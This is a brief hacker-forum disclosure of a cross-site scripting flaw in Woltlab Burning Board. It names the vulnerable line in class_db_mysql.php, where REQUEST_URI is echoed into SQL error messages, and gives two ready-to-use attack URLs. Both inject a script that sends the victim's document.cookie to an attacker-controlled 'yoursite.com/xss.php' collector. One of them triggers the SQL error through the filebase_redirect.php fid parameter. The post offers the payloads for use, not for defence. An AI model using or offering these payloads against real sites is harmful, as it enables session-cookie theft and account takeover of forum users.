hi again friends
i discovered a xss in wbb again ;)
in
wbb/acp/lib/class_db_mysql.php

in the 123.line

$errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."n<br>";

hmm what can we do with that?
if there is an sql db error you may do

/wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?cook='+es
cape(document.cookie)</script>

or you may use filebase mod for make an sql error

like that

http://www.wbbsite.com/filebase_redirect.php?fid='<script>location.href=
'http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>

WwW.SpyMasterSnake.org 
Tontonq ;)